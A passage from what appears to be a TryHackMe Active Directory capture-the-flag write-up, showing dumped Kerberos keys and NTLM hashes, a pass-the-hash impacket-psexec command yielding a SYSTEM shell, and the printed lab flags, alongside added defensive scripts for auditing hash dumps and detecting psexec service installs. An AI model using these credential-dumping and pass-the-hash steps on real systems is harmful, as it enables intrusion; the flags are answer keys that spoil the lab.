spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:b0ac624569c79015d3b836b64458f9039d072a1eab582c3fa3274dc94752f0cf
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:d0f5f147c4121e6f4ff0cb30cbd77583
ATTACKTIVEDIREC$:des-cbc-md5:3d4f6d61f71cf72a
[*] Cleaning up...
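The dump above is also useful as audit input. The following Python is an added example (not the writeup's or Impacket's code) that parses secretsdump's domain\uid:rid:lmhash:nthash lines and reports password reuse, empty passwords and stored LM hashes; the sample input reuses a few lines from the output above.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string: LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# A subset of the dump printed above (lines taken from this page's output).
SAMPLE_DUMP = r"""
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:72394637ee1662dc93da9066254ca864:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
"""


def parse_dump(text):
    """Yield (name, rid, lmhash, nthash) for each hash line. Status lines
    ('[*] ...') and the Kerberos-key section (no ':::' suffix) are skipped,
    and 'domain\\user' is reduced to the bare account name."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line.endswith(":::"):
            continue
        account, rid, lm, nt = line.split(":")[:4]
        yield account.rsplit("\\", 1)[-1], int(rid), lm.lower(), nt.lower()


def audit(text):
    """Check the dump for the credential-hygiene problems visible above."""
    rows = list(parse_dump(text))
    by_nt = defaultdict(list)
    for name, _, _, nt in rows:
        by_nt[nt].append(name)
    admin_nt = next((nt for _, rid, _, nt in rows if rid == 500), None)
    return {
        # identical NT hash means identical password (NT hashes are unsalted)
        "shared": {nt: names for nt, names in by_nt.items()
                   if len(names) > 1 and nt != EMPTY_NT},
        # empty password: expected for the disabled Guest, a problem elsewhere
        "empty": [name for name, _, _, nt in rows if nt == EMPTY_NT],
        # a real LM hash means the trivially crackable LM format is still stored
        "lm_stored": [name for name, _, lm, _ in rows if lm != EMPTY_LM],
        # any account whose password equals the built-in Administrator's (RID 500)
        "admin_password_reuse": [name for name, rid, _, nt in rows
                                 if nt == admin_nt and rid != 500],
    }


if __name__ == "__main__":
    for finding, value in audit(SAMPLE_DUMP).items():
        print(f"{finding}: {value}")
```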
Finally we use psexec with the Administrator's NTLM hash (pass-the-hash: no plaintext password is needed) to obtain a remote shell on the target running as SYSTEM. Note in the output how the tool uploads a randomly named executable to the ADMIN$ share and installs it as a service; that pattern is exactly what service-installation logging on the host would record:
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# impacket-psexec Administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on spookysec.local.....
[*] Found writable share ADMIN$
[*] Uploading file nYatAmbq.exe
[*] Opening SVCManager on spookysec.local.....
[*] Creating service vJod on spookysec.local.....
[*] Starting service vJod.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.
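The psexec output above leaves a recognisable trail on the target: a writable ADMIN$ share, an executable with a random 8-letter name uploaded into the Windows directory, and a service with a random 4-letter name created and started through the Service Control Manager. On a Windows host each service install is recorded in the System log as Event ID 7045, so a defender can key on exactly that shape. The script below is an added example (not part of the original writeup or of Impacket) that scores constructed 7045-style records against those indicators; the record layout and field names are assumptions, and the first record mirrors the service and binary names shown in the run above.

```python
"""Flag service installations that look like an impacket-psexec run.

Added example: scores constructed Event ID 7045 records ("A service was
installed in the system") against the indicators visible in the psexec
output above. Field names (EventID, ServiceName, ImagePath, ...) are an
assumption about how the log has been parsed, not a fixed schema.
"""
import re
from typing import Dict, List

# Constructed sample records. The first mirrors the writeup's psexec run
# (service vJod, binary nYatAmbq.exe dropped via ADMIN$); the others are
# ordinary service installs and a non-install event for contrast.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "7045", "ServiceName": "vJod",
     "ImagePath": r"%systemroot%\nYatAmbq.exe",
     "ServiceType": "user mode service", "StartType": "demand start"},
    {"EventID": "7045", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "ServiceType": "user mode service", "StartType": "auto start"},
    {"EventID": "7045", "ServiceName": "VendorAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --service',
     "ServiceType": "user mode service", "StartType": "auto start"},
    {"EventID": "7036", "ServiceName": "vJod",
     "ImagePath": "", "ServiceType": "", "StartType": ""},
]

# Shapes observed in the run above: 4-letter service, 8-letter binary,
# dropped directly into the Windows directory (what ADMIN$ maps to).
RANDOM_SERVICE = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY = re.compile(r"^[A-Za-z]{8}\.exe$", re.IGNORECASE)
WINDOWS_ROOT = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+$", re.IGNORECASE)


def image_path_binary(image_path: str) -> str:
    """Return just the executable part of an ImagePath (quotes and arguments removed)."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return path[1:end] if end != -1 else path[1:]
    return path.split(" ", 1)[0]


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the indicators one event matches; an empty list means nothing suspicious."""
    if event.get("EventID") != "7045":
        return []
    binary = image_path_binary(event.get("ImagePath", ""))
    basename = binary.rsplit("\\", 1)[-1]
    indicators: List[str] = []
    if RANDOM_SERVICE.match(event.get("ServiceName", "")):
        indicators.append("4-letter random-looking service name")
    if RANDOM_BINARY.match(basename):
        indicators.append("8-letter random-looking binary name")
    if WINDOWS_ROOT.match(binary):
        indicators.append("binary placed directly in the Windows directory (ADMIN$)")
    if event.get("StartType", "").lower() == "demand start":
        indicators.append("demand-start service (run once, not meant to persist)")
    return indicators


def suspicious_services(events: List[Dict[str, str]], threshold: int = 3) -> List[Dict[str, object]]:
    """Collect events that match at least `threshold` indicators."""
    hits = []
    for event in events:
        indicators = score_event(event)
        if len(indicators) >= threshold:
            hits.append({
                "service": event["ServiceName"],
                "binary": image_path_binary(event["ImagePath"]),
                "indicators": indicators,
            })
    return hits


if __name__ == "__main__":
    for hit in suspicious_services(SAMPLE_EVENTS):
        print(f"[!] {hit['service']} -> {hit['binary']}")
        for reason in hit["indicators"]:
            print(f"    - {reason}")
```

The threshold matters: a single indicator (a short service name, a demand-start service) is common in legitimate software, so the rule only fires when several line up, which is what the psexec run above does. Pairing this with the preceding 5145 share-access event for ADMIN$ from the same source host would tighten it further.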
Now we have to obtain the user flag and the root flag; the user flag is normally found under a user's profile, at a path like C:\Users\User\Desktop\user.txt.
So let's walk through the filesystem and find the flags.
C:\Windows\system32>
C:\Windows\system32> cd ..
C:\Windows> cd ..
C:\> cd Users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users
09/17/2020 04:03 PM <DIR> .
09/17/2020 04:03 PM <DIR> ..
09/17/2020 04:04 PM <DIR> a-spooks
09/17/2020 04:02 PM <DIR> Administrator
04/04/2020 12:19 PM <DIR> backup
04/04/2020 01:07 PM <DIR> backup.THM-AD
04/04/2020 11:19 AM <DIR> Public
04/04/2020 12:18 PM <DIR> svc-admin
0 File(s) 0 bytes
8 Dir(s) 14,711,631,872 bytes free
C:\Users> cd svc-admin
C:\Users\svc-admin> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users\svc-admin
04/04/2020 12:18 PM <DIR> .
04/04/2020 12:18 PM <DIR> ..
04/04/2020 12:18 PM <DIR> 3D Objects
04/04/2020 12:18 PM <DIR> Contacts
04/04/2020 12:18 PM <DIR> Desktop
04/04/2020 12:18 PM <DIR> Documents
04/04/2020 12:18 PM <DIR> Downloads
04/04/2020 12:18 PM <DIR> Favorites
04/04/2020 12:18 PM <DIR> Links
04/04/2020 12:18 PM <DIR> Music
04/04/2020 12:18 PM <DIR> Pictures
04/04/2020 12:18 PM <DIR> Saved Games
04/04/2020 12:18 PM <DIR> Searches
04/04/2020 12:18 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 14,708,277,248 bytes free
C:\Users\svc-admin> cd Desktop
C:\Users\svc-admin\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users\svc-admin\Desktop
04/04/2020 12:18 PM <DIR> .
04/04/2020 12:18 PM <DIR> ..
04/04/2020 12:18 PM 28 user.txt.txt
1 File(s) 28 bytes
2 Dir(s) 14,701,268,992 bytes free
We have found the first flag, located in C:\Users\svc-admin\Desktop; to read it we run the type command on the user.txt.txt file.
C:\Users\svc-admin\Desktop> type user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
C:\Users\svc-admin\Desktop> cd ..
C:\Users\svc-admin> cd ..
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users
09/17/2020 04:03 PM <DIR> .
09/17/2020 04:03 PM <DIR> ..
09/17/2020 04:04 PM <DIR> a-spooks
09/17/2020 04:02 PM <DIR> Administrator
04/04/2020 12:19 PM <DIR> backup
04/04/2020 01:07 PM <DIR> backup.THM-AD
04/04/2020 11:19 AM <DIR> Public
04/04/2020 12:18 PM <DIR> svc-admin
0 File(s) 0 bytes
8 Dir(s) 14,700,740,608 bytes free
C:\Users> cd backup
C:\Users\backup> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users\backup
04/04/2020 12:19 PM <DIR> .
04/04/2020 12:19 PM <DIR> ..
04/04/2020 12:19 PM <DIR> 3D Objects
04/04/2020 12:19 PM <DIR> Contacts
04/04/2020 12:19 PM <DIR> Desktop
04/04/2020 12:19 PM <DIR> Documents
04/04/2020 12:19 PM <DIR> Downloads
04/04/2020 12:19 PM <DIR> Favorites
04/04/2020 12:19 PM <DIR> Links
04/04/2020 12:19 PM <DIR> Music
04/04/2020 12:19 PM <DIR> Pictures
04/04/2020 12:19 PM <DIR> Saved Games
04/04/2020 12:19 PM <DIR> Searches
04/04/2020 12:19 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 14,700,478,464 bytes free
C:\Users\backup> cd Desktop
C:\Users\backup\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users\backup\Desktop
04/04/2020 12:19 PM <DIR> .
04/04/2020 12:19 PM <DIR> ..
04/04/2020 12:19 PM 26 PrivEsc.txt
1 File(s) 26 bytes
2 Dir(s) 14,700,478,464 bytes free
C:\Users\backup\Desktop> dir PrivEsc.txt
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users\backup\Desktop
04/04/2020 12:19 PM 26 PrivEsc.txt
1 File(s) 26 bytes
0 Dir(s) 14,700,335,104 bytes free
This is not the root flag, so we have to keep looking.
C:\Users\backup\Desktop> type PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
C:\Users\backup\Desktop>
C:\Users> cd Administrator
C:\Users\Administrator> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users\Administrator
09/17/2020 04:02 PM <DIR> .
09/17/2020 04:02 PM <DIR> ..
04/04/2020 11:19 AM <DIR> 3D Objects
04/04/2020 11:19 AM <DIR> Contacts
04/04/2020 11:39 AM <DIR> Desktop
04/04/2020 12:09 PM <DIR> Documents
04/04/2020 11:19 AM <DIR> Downloads
04/04/2020 11:19 AM <DIR> Favorites
04/04/2020 11:19 AM <DIR> Links
04/04/2020 11:19 AM <DIR> Music
04/04/2020 11:19 AM <DIR> Pictures
04/04/2020 11:19 AM <DIR> Saved Games
04/04/2020 11:19 AM <DIR> Searches
04/04/2020 11:19 AM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 14,695,067,648 bytes free
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users\Administrator\Desktop
04/04/2020 11:39 AM <DIR> .
04/04/2020 11:39 AM <DIR> ..
04/04/2020 11:39 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 14,695,067,648 bytes free
We have found the root flag, located in C:\Users\Administrator\Desktop; to read it we run the type command on the root.txt file.
C:\Users\Administrator\Desktop> type root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article has been written for ethical purposes.
Good Hack